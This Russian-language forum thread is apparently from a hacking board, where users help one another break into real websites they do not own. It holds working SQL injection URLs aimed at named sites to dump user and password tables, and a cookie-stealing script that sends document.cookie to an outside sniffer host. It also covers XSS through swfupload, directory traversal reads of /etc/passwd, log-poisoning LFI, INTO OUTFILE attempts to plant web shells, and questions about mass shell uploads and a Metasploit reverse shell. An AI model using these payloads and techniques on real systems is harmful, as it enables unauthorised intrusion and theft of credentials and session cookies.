Насколько я вижу, да. Хотя мб я что-то путаю, у меня не было никакого опыта с РНР и инъекциями, кроме полученного сейчас в процессе чтения кода сайта. Самый основополагающий запрос (в том плане, что там была небольшая цепочка наследуемых классов) там в таком виде:

$result = @mysql_db_query($this -> name , $p_SQL), где 1й параметр - имя БД, а второй, соответственно, сама строка с запросом.

Кстати, изначально, судя по комментам, файл был создан в 2003 году, так что возможно это как-то может объяснить mysql_db_query вместо mysql_query (хотя, по правде говоря, я не знаю, в чем разница).


XAMEHA said:
Да, можно изменить запрос как угодно. Можно передать скрипту свои данные вместо A, B, C, D, получить информацию из этой или других таблиц, получить значения C, D...


Если не сложно, могли бы пожалуйста написать пример входных значений FF и GG, чтобы сделать запрос к другой таблице и ее полям? А то каждая пробная попытка запроса отнимает много времени для того, чтобы создать необходимые условия для инъекции, и с моим нулевым опытом узнать методом проб и ошибок, как правильно задать входные значения для полного изменения запроса, это может занять вечность.

Rextor said:
Насколько я вижу, да.


Oops, не заглянул в мануал, функция сильно устаревшая.


Если не сложно, могли бы пожалуйста написать пример входных значений FF и GG, чтобы сделать запрос к другой таблице и ее полям? А то каждая пробная попытка запроса отнимает много времени для того, чтобы создать необходимые условия для инъекции, и с моим нулевым опытом узнать методом проб и ошибок, как правильно задать входные значения для полного изменения запроса, это может занять вечность.


У вас БД какой версии? Для MySQL 5 и 4:


Code:
FF: (пусто)
GG: 1 and 0 UNION SELECT concat(login, 0x3A, pass), 2, 3, 4 FROM users LIMIT 1

XAMEHA said:
У вас БД какой версии?


Если верить данным исполняемого файла (при условии, что я правильно понял; он был скачен и просмотрен в текстовом редакторе), то 5.1.67.


XAMEHA said:
Для MySQL 5 и 4


Для MySQL 5.4 или для MySQL 4.х и MySQL 5.х?

-- (Из прошлого моего комментария, т.к. ответ появился раньше, чем я дописал изменение) --

Если это поможет, то вот как формируется запрос (имена я изменил по ряду причин). Значения OUT_A и OUT_B выводятся в файл, а входные параметры $p_ina и $p_inb поддаются инъекции.


Code:
$sql = "select OUT_A, concat(NN1, ' ', NN2) as nn, OUT_B, LL";
$sql .= "from TABLE ";
$sql .= " where DD = 0";
$sql .= " and IN_A = '".$p_ina."'";
$sql .= " and IN_B = '".$p_inb."'";
$sql .= " and DDD = 1";
$this -> select_from_db($sql, $out_data);

Забыл, что в конце запроса был 4й входной параметр, но, я так полагаю, его можно просто закомментировать и его наличие ни на что не влияет.

UPD: после некоторых раздумий, я смог осознать предложенную механику, и мне таки удалось сделать по другому полю таблицы (и вероятно не проблема сделать запрос к другой таблице вообще). Спасибо за совет!

Где в RoundCube находится config файл который отвечает за коннект к БД?

Если не сложно, нужно еще немного помощи.

Пробую залить первичный шелл через SQL инъекцию, но не получается, запрос, судя по всему, выдает ошибку. Варианта два - либо нет прав на запись файла в директорию сайта (не думаю, что в этом дело) или, самое вероятное, проблему создает хвост запроса - " and DDD = 1". Если в случае обычного запроса к таблицам можно было избавиться от хвоста, написав запрос, который объединяет три подзапроса через union, где первый и третий использовались лишь для замыкания конструкций по обе стороны от места инъекции, а главная работа происходила во втором, то сейчас такой трюк не сработает, будет выдавать "Incorrect usage of UNION and INTO". Попытка закомментировать хвост через ;# или # не дает эффекта.

Код:


Code:
$sql = "select OUT_A, concat(NN1, ' ', NN2) as nn, OUT_B, LL";
$sql .= "from TABLE ";
$sql .= " where DD = 0";
$sql .= " and IN_A = '".$p_ina."'";
$sql .= " and IN_B = '".$p_inb."'";
$sql .= " and DDD = 1";
$this -> select_from_db($sql, $out_data);

Входные значение пробовал такие:

$p_ina - 1

$p_ina - ' union select OUT_A,2,3,4 from TABLE where OUT_A = 123 union select 1,2,3,4 into outfile 'tmp'#

Как добиться выполнения запроса - пока нет никаких идей.

UPD: решил проверить, а работает ли комментирование хвоста через # для обычного запроса. Как оказалось, работает (потому я упростил вышенаписанное значение переменной в соответствии с ситуацией). В таком случае, запрос на запись файла не работает по каким-то другим причинам. Что интересно, что если удалить подчеркнутую часть, тем самым оставив лишь запрос на получение данных из таблицы, то работает. Такое ощущение, что у mysql нет прав на запись файлов, даже в собственном каталоге - такое может быть?

Привет всем)Вот результат пентеста.Кто чё скажет?

[QUOTE="result"]
result said:
__________________________________________________ _____________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version v2.2
Sponsored by the RandomStorm Open Source Initiative
@_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
__________________________________________________ _____________
| URL: http://*****.ru/
| Started: Sun Mar 2 09:12:15 2014
[+] robots.txt available under: 'http://*****.ru/robots.txt'
[!] The WordPress 'http://*****.ru/readme.html' file exists
[+] Interesting header: KEEP-ALIVE: timeout=20
[+] Interesting header: SERVER: nginx
[+] XML-RPC Interface available under: http://*****.ru/xmlrpc.php
[+] WordPress version 3.3.1 identified from meta generator
[!] 5 vulnerabilities identified from the version number:
|
| * Title: Multiple vulnerabilities including XSS and Privilege Escalation
| * Reference: http://wordpress.org/news/2012/04/wordpress-3-3-2/
|
| * Title: Wordpress 3.3.1 Multiple CSRF Vulnerabilities
| * Reference: http://www.exploit-db.com/exploits/18791/
|
| * Title: XSS vulnerability in swfupload in WordPress
| * Reference: http://seclists.org/fulldisclosure/2012/Nov/51
|
| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScan..
|
| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback..
[+] WordPress theme in use: f2 v1.0.10
| Name: f2 v1.0.10
| Location: http://*****.ru/wp-content/themes/f2/
[+] Enumerating plugins from passive detection ...
| 2 plugins found:
| Name: contact-form-plugin v3.38
| Location: http://*****.ru/wp-content/plugins/contact-form-plugin/
| Readme: http://*****.ru/wp-content/plugins/contact-form-plugi..
|
| * Title: Contact Form 3.36 - contact_form.php cntctfrm_contact_email Parameter XSS
| * Reference: http://secunia.com/advisories/52250
| * Reference: http://osvdb.org/90503
| Name: nextgen-gallery
| Location: http://*****.ru/wp-content/plugins/nextgen-gallery/
| Readme: http://*****.ru/wp-content/plugins/nextgen-gallery/re..
| Changelog: http://*****.ru/wp-content/plugins/nextgen-gallery/ch..
|
| * Title: SWF Vulnerable to XSS Bundled in Many WordPress Plugins
| * Reference: http://brindi.si/g/blog/vulnerable-swf-bundled-in-wor..
| * Reference: http://secunia.com/advisories/51271
| * Fixed in: 1.9.8
|
| * Title: NextGEN Gallery

Проверив все, что пришло в голову, я попал в тупик. Учетная запись в mysql по всей видимости очень урезана, из-за чего я не могу производить запись в файл. Я пробовал вывести список того, какие права ей даны, но максимум, что мне показывает, так это "USAGE:NO", других видов прав как будто не существует (даже если строго задать запрос на показ значения, наприме для FILE). Доступа к mysql.user конечно же у меня нет, а чтение grantee из information_schema.user_privileges показывает лишь мой используемый аккаунт.

Помимо этой sql инъекции есть php инъекция на чтение файлов (не root). Пробовал найти места страниц на исполнение кода, но в программе нигде не используются eval, exec, shell_exec, возможности инъекции в include/require тоже не смог найти (плюс, запрещено подключение файлов извне сервера, так что если вдруг, то только локально), и ко всему прочему ко многим глобальным переменным, как $_SESSION, $_GET, $_POST, $_REQUEST, применяется mysql_real_escape_string, strip_tags, htmlspecialchars (я же использую упущение при необработке cookies). Доступ к админ панели закрыт путем ограничения по списку допустимых IP адресов через $_SERVER['REMOTE_ADDR']. Быть может есть уязвимости в каких-то других файлах сайта, но получить список файлов я не могу, и потому приходится довольствоваться лишь тем, что было найдено в виде упоминаний в известных страницах плюс свои догадки о существовании страниц/файлов.

По правде говоря, у меня закончились идеи, как можно было бы попытаться залить шелл. Не то, что бы я собирался что-то делать с сайтом, мне интересна сама возможность получить доступ к серверу как факт (это моя первая попытка в области взлома сайтов, потому очень хочется добиться хорошего результата). Если у кого-нибудь есть идеи, что можно было бы еще попытаться предпринять, буду рад услышать.

вопрос про параметри limit

в таблице 300 записей, как указать параметр limit, чтобы все данные отобразились сразу

reuvenmatbil said:
вопрос про параметри limit
в таблице 300 записей, как указать параметр limit, чтобы все данные отобразились сразу


чтобы все отобразились лимит вобще не нужен

reuvenmatbil said:
вопрос про параметри limit
в таблице 300 записей, как указать параметр limit, чтобы все данные отобразились сразу


limit 0, 300

Первое число, с какой строки начинать выборку

Второе кол-во выводимых строк

Можно ли каким-либо образом через SQL инъекцию, которая обрабатывается через mysql_db_query (PHP), выполнить SET операцию? Поскольку на group_concat по умолчанию стоит ограничение длины результата в 1024 символа, вытаскивать данные такими мелкими порциями очень ресурсо/времязатратно, потому хотелось бы попытаться выполнить "set group_concat_max_len = 100500".

Xss (http://seclists.org/fulldisclosure/2012/Nov/51) Подскажите как раскрутить уязвимость)

CoolHucker said:
Xss (http://seclists.org/fulldisclosure/2012/Nov/51)
Подскажите как раскрутить уязвимость)


Ищешь уязвимый сайт => подставляешь JS код.

MaxFast said:
Ищешь уязвимый сайт => подставляешь JS код.


Он имеет ввиду атака через уязвимый flash плагин, но там показан пример ниже

это понятно)прописываю


Code:
http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28 document.cookie%29;//

даёт мои куки,как я понял.затем написано undefined кликаю,открывается окно заливки файлов..Но что нужно залить?непосредственно js со сниффером?

CoolHucker said:
это понятно)прописываю

Code:
http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28 document.cookie%29;//

даёт мои куки,как я понял.затем написано undefined кликаю,открывается окно заливки файлов.
.Но что нужно залить?непосредственно js со сниффером?


Ну в интернете тема с XSS изъезженна.

Примитивный JS код:


Code:
img = new Image();
img.src = "http://доменсниффера.ру/сниффер.gif?"+document.cookie;

Ну в интернете тема с XSS изъезженна.


Не пинай чайника) нужно залить файл с расширением js,в котором написан этот скрипт)так?

CoolHucker said:
Не пинай чайника) нужно залить файл с расширением js,в котором написан этот скрипт)так?


Если ты можешь залить .html файл с JS кодом и картинкой сниффера - б-га ради.

А так нужно выполнить код в рамках XSS (Именно там где алерт).

Если ты можешь залить .html файл с JS кодом и картинкой сниффера - б-га ради.
А так нужно выполнить код в рамках XSS (Именно там где алерт).


почитал)вроде понял)благодарю

Подскажите.

Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.

На сервере выключены системные команд, и в disable functions стоит функция chmod()

Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?

Грабитель said:
Подскажите.
Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.
На сервере выключены системные команд, и в disable functions стоит функция chmod()
Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?


как вариант попробовать изменить дефолтное значение чмод, которая описана вроде в системном файле

Подскажите пожалуйста Web сниффер для кражи куки. И ещё ,что нужно вставить вместо слова сниффер или можно оставить так?


img = new Image();
img.src = "http://доменсниффера.ру/сниффер.gif?"+document.cookie;

Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.
На сервере выключены системные команд, и в disable functions стоит функция chmod()
Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?


Едва ли вообще все закрыто, если сайты не статичны. Загрузка хлама в админках, кеш и прочая фигня обычно доступны для записи. Ищите конфиги от баз и админок, попробуйте пройти через бд.


Подскажите пожалуйста Web сниффер для кражи куки. И ещё ,что нужно вставить вместо слова сниффер или можно оставить так?


Годный сниффер реализуется одним лишь веб-сервером. Никакой пхп тут не нужен. Для кук ничего больше не нужно, но, возможно, есть смысл посмотреть в сторону beef.

Можно конкретно дать ссылку на онлайн сниффер?

CoolHucker said:
Можно конкретно дать ссылку на онлайн сниффер?


хттпс://hpc.name/sniffer


Не реклама

MaxFast,Спасибо..А то пишут,то чего я не понимаю.

Для куки он подойдёт?

Нашел на сайте читалку файлов,нашел лог,пишу в лог , , и тд но не работает , в логах этот код выделяется красным ,и не хочет исполняться , что делать?

есть на сайте файли phpinfo.php

вот инфа от туда

register_globals Off

safe_mode Off

magic_quotes_gpc Off

Если это читалка файлов, единственное её предназначение - показывать содержимое файла, не !подключать его содержимое! и не интерпретировать. Если есть возможность, прочитайте конфиг-файлы.

Inoms said:
Если это читалка файлов, единственное её предназначение - показывать содержимое файла, не !подключать его содержимое! и не интерпретировать. Если есть возможность, прочитайте конфиг-файлы.


есть

доступ во все папки

home

var

usr

etc

и тому подобное а так же к логам

читка конфигов нечего не дала

без вариков залиться через логи?

swat_ said:
есть
доступ во все папки
home
var
usr
etc
и тому подобное а так же к логам
читка конфигов нечего не дала
без вариков залиться через логи?


без вариантов, но можно прочитать конфиги сайта, подключиться к БД, посмотреть пароль админа, залиться через сайт

OxoTnik said:
без вариантов, но можно прочитать конфиги сайта, подключиться к БД, посмотреть пароль админа, залиться через сайт


бида в том ,что доступ к бд возможен только с целевого сервера,из вне не подключиться((

swat_ said:
бида в том ,что доступ к бд возможен только с целевого сервера,из вне не подключиться((


ну так найди phpmyadmin

Вспомнил, что у меня есть сайт, с подобной ситуацией, как выше. Тоже самое - не прокатывает интерпретация в логах, которые доступны. Стандартные логи не открываются, не хватает прав.


Code:
if($_REQUEST['imagepath']){

//Available file types
$aMimeTypeList = array(
'image/jpeg',
'image/png',
'image/gif',
);

if(substr($_REQUEST['imagepath'],0 ,6) == '/home/'){
if(file_exists($_REQUEST['imagepath'])){

/* DO NOT USE UNTIL GLOBAL DID ITS WORK :/

$oFileInfo = finfo_open(FILEINFO_MIME_TYPE);
$sMimeType = finfo_file($oFileInfo, $_REQUEST['imagepath']);
if(in_array($sMimeType, $aMimeTypeList)) {
echo file_get_contents($_REQUEST['imagepath']);
}
else echo "Unsupported file type: ".$sMimeType;
*/
///24 строка echo file_get_contents($_REQUEST['imagepath']);
}

Это код файла через который читаю файлы, стоит директория /home, не знаю ограничение это или что, но обходиться таким макаром /home/../var/. Читать дает все что в хоум, и частично из системных папок. Но /proc/pid/fd/fid как и сами логи не дает открыть, Permission denied on line 24. Пути до них нашел вслепую.

24 строку пометил в коде.

По поводу бд - есть очень много бд и все данные к ним, но базы я так понял, лежат в подсетях и подключение только из локалки и некоторых адресов(?). Есть список доступных ip для подключения к одной из баз, но может быть не для всех есть вайт лист. Если есть возможность подключиться из вне и как это можно реализовать, буду благодарен за помощь.

И вообще буду благодарен, за любой совет по теме.

Спасибо.

swat_ said:
Нашел на сайте читалку файлов,нашел лог,пишу в лог , , и тд но не работает , в логах этот код выделяется красным ,и не хочет исполняться , что делать?
есть на сайте файли phpinfo.php
вот инфа от туда
register_globals Off
safe_mode Off
magic_quotes_gpc Off


Взлом - это в первую очередь изначально сбор информации о цели. Ты либо ее не собрал либо не показал нам: порты, субдомены, скан директорий, какая CMS, информация о домене, хостере, пробив мыл с сайта, проверка диапазона сети, чек найденных паролей на других сервисах etc.

Прошу помощи, нашёл на сайте это:

http://site.com/file.php?filename=../../../../../../../../../../etc/passwd

Выводит содержимое:


Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
webuser:x:497:495::/home/webuser:/sbin/nologin
user123:x:500:500::/data/www:/sbin/nologin
administrator:x:501:501::/home/administrator:/bin/bash

по сути я весь исходный код сайта прочитал, нашёл данные от БД, но удаленно подключится не получилось.

Подскажите что можно ещё сделать? нужно получить доступ к БД.

sav77,в случае если это все-же LFI попробуй например:

_ttp://forum.xakepinter.net/showthread.php?t=474

OxoTnik said:
sav77
ищи phpmyadmin.
И вообще, ты полностью копируешь вопросы предыдущего оратора, смотри ответы выше


Сайт работает на MSSQL, но там указан ip к подключению этот 192.168.1.19, хз как подключится к нему...

Там не LFI, а directory traversal я так понял.

Продолжение все той же прошлой истории.

Когда я уже решил забить на взлом сайта (ну, точней как, полазить в БД я смог, что интересно было посмотрел, но вообще мне хотелось внедрить шелл), я решил пробить адрес сайта в гугле и обнаружил их тестовый сервер, который функционально работает точно так же, как и оригинал. Что приятно, на тестовом сервере БД работает под админской учетной записью. Права file_priv есть, файлы через load_file() читаются, а значит логично предположить, что в таких условиях и into outfile тоже должен быть активен. Тем не менее, писать файлы мне не удается, предположительно из-за того, что у mysql процесса нет прав на запись в тех директориях, куда я пробовал. Что самое удивительное, мне почему-то не удается записать файл даже через select 1 into outfile 'tmp.txt', т.е. в домашнюю директорию mysql, куда, по идее, mysql должен иметь права на запись.

Так вот, как вообще находят директории для записи файлов? Банально логически или есть какой-то подход? И какие директории можно протестировать, чтобы понять наверняка, может ли msql вообще хоть куда-нибудь писать файлы или нет.

Upd: попробовал писать хотя бы в /tmp но тоже не срабатывает, что совсем странно. Я теряюсь в догадках, в чем может быть дело, с учетом того, что это тестовый сервер и аккаунт к БД админский (т.е. логично предположить, что там не должно быть строгой защиты) - то ли я что-то делаю не то, либо на mysql процесс висит запрет на запись файлов, либо я даже не знаю что тут думать. При этом на тестовой сервере открыт порт mysql (хотя конечно же я не могу подключится без соответствующей записи в БД, которую наврядли можно добавить через select инъекцию) и несколько устаревший webmin 1.5.9

Upd2: вобщем, оказалось, что несмотря на сообщение об ошибке, файлы писались на тестовом сервере (заодно узнал, что на основном сервере у меня все же нет FILE прав), но доступа на запись в домашний каталог у меня нет (где и располагались файлы сайта), и LFI уязвимостей в имеющемся коде тоже нет. Так что без вариантов, разве что внезапно появится какой-нить подходящий эксплоит.

img = new Image(); img.src = "http://httpz.org/***.png"+document.cookie; location.href ="http://*****.ru//"


Парни вот это мы куда потом в консоль пишем помогите плиз)

Можно ли залить веб шелл в одном из этих форматов?


7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jp eg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|pn g|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf| sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|x ml|zip

zombak18 said:
Можно ли залить веб шелл в одном из этих форматов?


та в любом можно, только работать не в одном не будет

zombak18 said:
Можно ли залить веб шелл в одном из этих форматов?


Смотря при каких обстоятельствах.

Из под админки загрузить файл с вредоносом - одно, при LFI - уже совсем другое, обойти преобразование типов, resize - вообще третье.

Так что информации очень мало для однозначного ответа.

Никто не поможет?)

zombak18 said:
Можно ли залить веб шелл в одном из этих форматов?


Шелл можно вписать в любой из этих форматов. Другое дело, что при нормальных настройках ни один из них не будет исполняться веб-сервером. Поэтому вам надо либо догружать .htaccess, либо делать lfi. Либо же обходить фильтры на формат\расширение.

kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+

Не могу найти путь к корню сайта

Win32BOT said:
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+
Не могу найти путь к корню сайта


Я пошел по пути родителя, хотя он уже и на другом сервере: http://flb.ru/user_config.php

"Fatal error: Class 'User' not found in /var/www/flb.ru/user_config.php on line 10"

В гуглкеш нашлось такое:

"Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '95.211.1.162' (4) in /home/u475266731/public_html/portal-object/db/dbconnect.obj.php on line 45"

В общем, я бы посоветовал ковырять в сторону соседей.

PHP:
http://agfmpack.ru/page/92'/

Кто знает как раскрутить?

Подобрал пароль от Apache Tomcat/7.0.47

Что можно там сделать? Есть ли способ порутать сервак полностью?

Проблемка

есть таблица user

узнаем колонки

http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 75736572+--+

Далее делаю

http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password ),4,5+from+user+--+

И результат: ПУСТОТА!

Need help!

AHTNkiller said:
Проблемка
есть таблица user
узнаем колонки
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 75736572+--+
Далее делаю
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password ),4,5+from+user+--+
И результат: ПУСТОТА!
Need help!


укажи с какой БД хочешь вытащить, например mysql

http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Passwo rd%29,4,5+from+mysql.user--

список БД


http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,schema_name,4,5+from+informatio n_schema.schemata--

Парни помогите ответить на вопросы,если можно на примерах!


CoolHucker said:
1.Откуда берут шеллы для слива трафика?
2.Киньте ссылку на актуальную версию WSO
3.Если сначало ищут ресурс,потом сканят,потом ломают-получают доступ-заливают шелл(откуда берут русурс?С неба он не падает)
4.Если лить шеллы пачками как это делать?


Если кто-то всё это знает,помогите,Не обижу

CoolHucker said:
Парни помогите ответить на вопросы,если можно на примерах!
Если кто-то всё это знает,помогите,Не обижу




CoolHucker said:
1.Откуда берут шеллы для слива трафика?


сам понял что спросил?


CoolHucker said:
2.Киньте ссылку на актуальную версию WSO


тебя в гугле забанили?


CoolHucker said:
3.Если сначало ищут ресурс,потом сканят,потом ломают-получают доступ-заливают шелл(откуда берут русурс?С неба он не падает)


омг, ты реально такой тупой или шутишь? в гугл вбиваешь слово лох и вот тебе куча ресурсов


CoolHucker said:
4.Если лить шеллы пачками как это делать?


руками блэть


OxoTnik said:
укажи с какой БД хочешь вытащить, например mysql
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Passwo rd%29,4,5+from+mysql.user--
список БД


та не, нефига)) если бы была выбрана не та БД то написало бы ошибку, нужно вывод взять в substr

deleted

psihoz26 said:
Помогите раскрутить
Кавычку в начале поставил для вывода ошибки.
Вместо сортировки по столбцам сортируется по словам из сообщений под фото.
Запрос обрезается таким набором символов - %00+--+

Code:
http://%host%/az/search/?query='1+IN+STRING+MODE%29+order+by+150%00+--+

%host% =photo.trend.az



....


query=1'*(extractvalue(1,concat(0x3a,verSion())))* '&x=0&y=0

YaBtr где можно почитать про extractvalue?

?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a, file_priv)+from+mySql.uSer))*%20'&x=0&y=0

почему не работает? синтаксис у меня кривой или прав нету?

psihoz26 said:
YaBtr
где можно почитать про extractvalue?
?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a, file_priv)+from+mySql.uSer))*%20'&x=0&y=0
почему не работает? синтаксис у меня кривой или прав нету?


1. И синтаксис кривой и прав не хватает.

2. http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html

Там же написано об updatexml.


?query=1'*(updatexml(1,concat(0x3a,(Select+table_n ame+from+information_Schema.tableS limit 1)),4))*'&x=0&y=0

Юзаю вот этот сплойт proftp_telnet_iac+meterpreter/reverse_tcp. Какой порт нужно прописывать в reverse_tcp(LPORT)? И нужно ли его открывать ?

Подскажите Парсер сайтов(приват или паблик) зареганных в LIVEINTERNET,TOPMAIL,TOP100RAMBLER,HOTLOG

SQL движок

Есть несколько скулей типа:

host.com/page.php?id=19' and 1=(select 1) --

движок например точно не mysql - запрос c /*!00000 some_shit */ срабатывает - если бы был мускул, была бы ошибка в синтаксисе - some_shit,

ни Oracle - запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает.

если бы была mssql или postgre, то в большинстве случаев сработал бы запрос с Select из таблицы information_schema.tables - host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает.

и ещё одна особенность - и ни в одной из скуль не проходит запрос с ORDER BY.

что это может быть за движок?

JohnnnDoe said:
Есть несколько скулей типа:
host.com/page.php?id=19' and 1=(select 1) --
движок например точно не
mysql
- запрос /*!00000 some_shit */ не срабатывает,
ни
Oracle
- запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает.
если бы была
mssql
или
postgre
, то в большинстве случаев сработал бы запрос с Select из таблицы
information_schema.tables
- host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает.
и ещё одна особенность - и ни в одной из скуль не проходит запрос с
ORDER BY
.
что это может быть за движок?


Движок или субд? Ссылку в студию\пм, посмотрим на ваш движок и на субд. Причин для невыполнения упомнутых запросов может быть масса, и большая часть не относится непосредственно к самой субд.

madhatter, СУБД.

сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.

Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?

Ещё очень характерная особенность!

срабатывает такой запрос:

[COLOR="Green"]host.com/page.php?id=19' and 1

[QUOTE="JohnnnDoe"]
JohnnnDoe said:
madhatter
, СУБД.
сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.
Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?
Ещё очень характерная особенность!
срабатывает такой запрос:
[COLOR="Green"]host.com/page.php?id=19' and 1

Целевой хост по портам сканировали? select version() делали? Часто субд выбирают вместе с операционкой. Ос на цели какая?


nmap определил как Linux. Но это ни о чём не говорит - скрипт на целевом хосте может легко коннектится к БД на другом сервере. Скрипты платные. PHP, Apache.

Спасибо за подсказку про sqlmap.

Но, судя по всему, это какая-то специфичная/малораспространённая в веб-проектах СУБД.

JohnnnDoe said:
nmap определил как Linux. Но это ни о чём не говорит - скрипт на целевом хосте может легко коннектится к БД на другом сервере. Скрипты платные. PHP, Apache.
Спасибо за подсказку про sqlmap.
Но, судя по всему, это какая-то специфичная/малораспространённая в веб-проектах СУБД.


Может, конечно, да редко бывает. Например, совсем не часто увидишь php+ubuntu+nginx+apache -> mssql.

1) version(); ?

2) sqlmap output?

3) nmap -sV -p 0-65535 ?

4) cms?

Подозреваю, ответы на эти вопросы позволят однозначно идентифицировать вашу субд.

madhatter, спасибо! твой совет реально помог! sqlmap нашёл вывод и определил СУБД - это postgresql.

Немного странный вопрос:

К примеру есть насайте LFI. Может ли быть такое что никак совсем ничего не сделать кроме как читать и инклудить файлы которые уже есть? Или настоящий про всегда найдет способ залить шелл?

Подскажите ещё норм фаззер с хорошей базой для поиска файлов(php конфигов, логов nginx,etc)

как вариант- найти путь до логов сервера и послать ему пакет с php-кодом в User-Agent и потом проинклудить этот лог

Нашел nginx.conf

В нём записи


Code:
#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;

#access_log logs/access.log main;

Если это абсолютный путь то я вообще ничего не понимаю


Code:
../../../../etc/passwd%00

-работает


Code:
../../../../logs/error.log%00
../../../../logs/access.log%00

-неработает

Идём далие


Code:
../../../../proc/self/environ%00

- выдает мне всего одну строку причём всегда.


Code:
SSH_CLIENT=%ТУТ БЫЛ ЧЕЙТО IP% 49719 21012

psihoz26 said:
Нашел nginx.conf
В нём записи

Code:
#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;

#access_log logs/access.log main;

Если это абсолютный путь то я вообще ничего не понимаю

Code:
../../../../etc/passwd%00

-работает

Code:
../../../../logs/error.log%00
../../../../logs/access.log%00

-неработает
Идём далие

Code:
../../../../proc/self/environ%00

- выдает мне всего одну строку причём всегда.

Code:
SSH_CLIENT=%ТУТ БЫЛ ЧЕЙТО IP% 49719 21012



Как подсказывает шарп в начале строки, это комментарии в конфиге. К тому же, nginx как правило проксирует апач рядом, который тоже ведет логи. И собственно, в чем вопрос?

